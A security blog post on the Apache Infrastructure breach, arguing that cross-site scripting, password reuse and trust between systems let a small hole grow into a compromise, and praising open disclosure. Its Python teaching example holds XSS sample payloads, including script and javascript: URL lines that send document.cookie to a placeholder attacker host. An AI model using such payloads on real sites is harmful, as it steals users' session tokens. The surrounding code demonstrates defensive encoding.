Last week the folks on the Apache Infrastructure Team were hit with a direct, targeted attack. The bad news is that the attackers likely got the access they were looking for; the good news is that the Apache team was able to move from incident to detection to remediation in near record time, and they've provided an excellent write-up that gives a glimpse into the process that both they and the attackers used during the incident.
This provides a very good real-world example of the problems that can come about from a cross-site scripting attack, a vulnerability type that many people scoff at as little more than a "toy". We also see how peripheral services, such as a ticketing or issue-tracking system, can be leveraged to gain access to core systems.
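To make the "XSS is a toy" point concrete, here is an added example of my own; it is not code from the Apache write-up and does not reproduce the details of their incident. It models a ticket tracker that renders three reporter-controlled fields (a title inside an attribute, a comment as element content, and a "related" link) and shows the same page rendered naively and with context-appropriate encoding. The sample inputs and the host name attacker.invalid are constructed for the example.

```python
import html
from urllib.parse import urlsplit

# Constructed sample inputs (assumed for this example; not taken from the
# Apache write-up): three fields an untrusted reporter can fill in on a ticket.
SAMPLE_TITLE = 'Crash in parser" onmouseover="alert(1)'
SAMPLE_COMMENT = ('Build fails on trunk <script>new Image().src='
                  '"http://attacker.invalid/?c="+document.cookie</script>')
SAMPLE_LINK = 'javascript:fetch("http://attacker.invalid/?c="+document.cookie)'


def render_vulnerable(title: str, comment: str, link: str) -> str:
    """Naive template: user-supplied text dropped as-is into an attribute,
    into element content and into a URL. Each spot is a different injection
    context, and each one here is exploitable."""
    return (
        f'<h1 title="{title}">{title}</h1>\n'
        f'<div class="comment">{comment}</div>\n'
        f'<a href="{link}">related</a>'
    )


def safe_url(url: str) -> str:
    """Allow only absolute http/https links. Escaping cannot fix a
    javascript: or data: URL, so the scheme has to be allow-listed; anything
    else (including relative links, to stay conservative) becomes '#'."""
    cleaned = url.strip()
    scheme = urlsplit(cleaned).scheme.lower()
    return cleaned if scheme in ("http", "https") else "#"


def render_hardened(title: str, comment: str, link: str) -> str:
    """Same page, with output encoding for the attribute and text contexts
    and scheme filtering for the URL context."""
    t = html.escape(title, quote=True)      # quote=True also escapes " and '
    c = html.escape(comment, quote=True)
    u = html.escape(safe_url(link), quote=True)
    return (
        f'<h1 title="{t}">{t}</h1>\n'
        f'<div class="comment">{c}</div>\n'
        f'<a href="{u}">related</a>'
    )


def surviving_injections(page: str) -> list:
    """Crude post-render check: which of the three primitives made it into the
    page as live markup? Returns names in a fixed order; empty means none."""
    p = page.lower()
    found = []
    if "<script" in p:
        found.append("script-tag")
    if ' onmouseover="' in p:
        found.append("event-handler")
    if 'href="javascript:' in p:
        found.append("javascript-url")
    return found


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable),
                         ("hardened", render_hardened)):
        page = render(SAMPLE_TITLE, SAMPLE_COMMENT, SAMPLE_LINK)
        print(f"--- {name} ---\n{page}\nsurviving: {surviving_injections(page)}\n")
```

The comment payload is the one that matters for the "peripheral service to core system" chain: a script running in a logged-in administrator's browser can read whatever that browser has (session tokens, form data) and ship it off-site, so the tracker's trust in its own session becomes the attacker's. Note that `html.escape` alone does nothing for the link field; URL contexts need scheme filtering, which is why `safe_url` exists as a separate step.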
And of course we see that old standby: using the same password to access multiple systems. I know it's tough to remember all those different passwords, and it's difficult to enforce a policy like this between systems that might otherwise have no communication, but it is possible. I'd recommend an approach similar to |)ruid's Mnemonic Password Formulas.
All in all this is an excellent illustration of how single vulnerabilities can quickly be escalated into significant system compromises. The first cross-site scripting vulnerability or buffer overflow gives an attacker a foothold; after that it's a matter of leveraging trust relationships between systems. And it's up to administrators to understand those relationships and connections between systems, especially between ICS and external networks, better than an attacker could, and to take the time to mitigate potential problems before they're exploited.
For me, what was more important than the vulnerabilities themselves was how this breach disclosure highlighted the way transparent disclosure provides useful and actionable threat data to the community.
Contrast this disclosure with the vague off-the-record leaks about "CyberSpies" infiltrating the power grid that generate headlines but ultimately provide no actionable information apart from a headline you can add to your scary slideware.
It should come as no surprise that Open Source projects set a high bar that commercial entities can only aspire to. Whether vulnerabilities or incidents, those reported by Open Source projects are less likely to be the marketing and PR activities we expect from their commercial counterparts. The ASF should be commended for their transparency.